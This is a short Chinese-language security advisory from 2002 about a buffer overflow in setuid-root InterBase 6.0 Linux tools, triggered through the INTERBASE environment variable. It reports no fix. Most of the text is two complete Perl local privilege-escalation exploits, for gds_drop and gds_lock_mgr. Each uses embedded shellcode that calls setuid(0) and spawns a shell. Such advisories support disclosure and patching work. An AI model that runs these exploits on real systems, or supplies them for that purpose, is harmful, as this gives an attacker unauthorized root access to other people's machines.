interbase存在堆破坏问题发布时间:2002-06-19 更新时间:2002-06-19 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式 受影响系统 interbase-6.0-1.i386.rpm详细描述 interbase-6.0-1.i386.rpm包中的几个工具以SETUID ROOT权限安装: /usr/local/interbase/bin/gds_drop /usr/local/interbase/bin/gds_inet_server /usr/local/interbase/bin/gds_lock_mgr 其中在读取"INTERBASE"环境变量时存在漏洞,可导致产生缓冲溢出,并获得ROOT权限。 测试代码 #!/usr/bin/perl -w # # gds_drop exploit for Interbase 6.0 linux beta # # - tested on redhat 7.2 # # - Developed in the Snosoft Cerebrum test labs # - (http://www.snosoft.com) - overflow found by KF # # coded by stripey - 15/06/2002 (stripey@snosoft.com) # ($offset) = @ARGV,$offset || ($offset = 0); $sc = "\x90"x512; $sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; $sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; $sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; $sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh"; $ENV{"FOO"} = $sc; $buf = pack("l",(0xbffffdc0+$offset))x86; $buf .= "A"; $ENV{"INTERBASE"} = $buf; exec("/usr/local/interbase/bin/gds_drop"); #!/usr/bin/perl -w # # gds_lock_mgr exploit for Interbase 6.0 linux beta # # - tested on redhat 7.2 # # - Developed in the Snosoft Cerebrum test labs # - (http://www.snosoft.com) - overflow found by KF # # Note: We cannot attach to an interactive shell so it # will execute /tmp/sh instead... # # coded by stripey - 15/06/2002 (stripey@snosoft.com) # ($offset) = @ARGV,$offset || ($offset = 0); $sc = "\x90"x512; $sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; $sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; $sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; $sc .= "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; $ENV{"FOO"} = $sc; $buf = pack("l",(0xbffffdc0+$offset))x86; $buf .= "A"; $ENV{"INTERBASE"} = $buf; exec("/usr/local/interbase/bin/gds_lock_mgr"); 解决方案 尚无 相关信息 KF (dotslash@snosoft.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-06/0206.html |
